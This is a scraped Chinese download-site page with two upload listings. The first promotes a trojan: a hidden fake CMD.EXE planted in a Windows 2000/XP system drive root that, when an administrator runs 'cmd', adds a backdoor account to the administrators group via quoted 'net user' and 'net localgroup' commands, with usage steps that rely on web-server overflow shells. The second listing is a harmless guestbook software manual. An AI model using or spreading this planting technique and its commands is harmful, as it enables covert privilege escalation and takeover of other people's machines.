你是不是經常在開始菜單的運行窗口里運行命令呢? 看看這個漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在執行搜索的時候, 首先查找根目錄 而開始菜單的運行窗口里執行命令, 也是首先在系統盤的根目錄里進行查找. 這個漏洞其實是已經是公開的秘密了. 既然現在作為漏洞公布出來, 我也就把網上的PasswordReminder.cpp拿來改了改 加了一個加超級管理員用戶和執行cmd.exe的功能. 使用方法: 把程序解壓, 把壓縮包里的文件 CMD.EXE (該文件具有隱藏和只讀屬性) 釋放到目標機器的系統盤根目錄, 一般都是在C:比如利用UNICODE/Decode漏洞就有寫根目錄的權限, 同時Asp/fp30reg.dll等遠程溢出出來的Shell, 一般都只有匿名權限, 但是它具有寫根目錄的權限 這個時候, 就可以把本程序放到目標機器的系統盤根目錄 只要等管理員在機器的開始菜單里運行命令: cmd 一切盡在掌握中.:) PS: 系統執行后, 會先產生一個線程來做一些處理 然后用system()函數調用cmd.exe來讓用戶能夠執行命令. 產生出來的線程會產生兩個進程序執行如下兩個命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 這樣就在系統上增加了一個超級
標簽:
964057
zdnet
http
2100
上傳時間:
2015-01-12
上傳用戶:qlpqlq
藍麗Net留言系統說明手冊 1:藍麗Net留言系統亮點提示 藍麗Net留言系統雖然開發的時間較短,但實為技術內涵較高,有其獨特的風格特點 主要用途:使訪客自由留言,管理員(站長)自由回復,或用于信息發布,資料存儲 綜合特點(采用較新的asp.net+xml+xsl設計,一應功能俱全,老搭檔新品種該有的功能都有了 版面清爽,速度流暢,操作方便,安全穩定,安裝管理方便,占用資源少,占用空間少 PS:FYW真能吹^-^) 性能方面:普通PC機訪問本系統主頁,能夠達到50-200MS,這方面Xml若遜于Html方式輸出的速度 安裝方面:非常簡單,幾乎無需改動或根據您的要求少加改動,上傳至服務器即可正常運行 安全方面:在本人已知的Asp,Asp.net存在的(數據提交,Sql注入,Cookies欺騙,跨站提交,注水提交)等安全隱患上下了許多工夫,經仔細測試在這些方面約能達到98%的安全,至于 本人未接觸到的安全隱患方面,請自行升級或提示本人改正 2:安裝調試藍麗Net留言系統 ---既然看到了本幫助文件,那相信此時您已將本系統壓縮包(rar,zip)解壓 ---首先,請確認您的服務器操作系統支持運行Asp.net,IE版本在5.5以上,或者您有遠程虛擬主機
標簽:
Net
上傳時間:
2013-12-15
上傳用戶:天涯
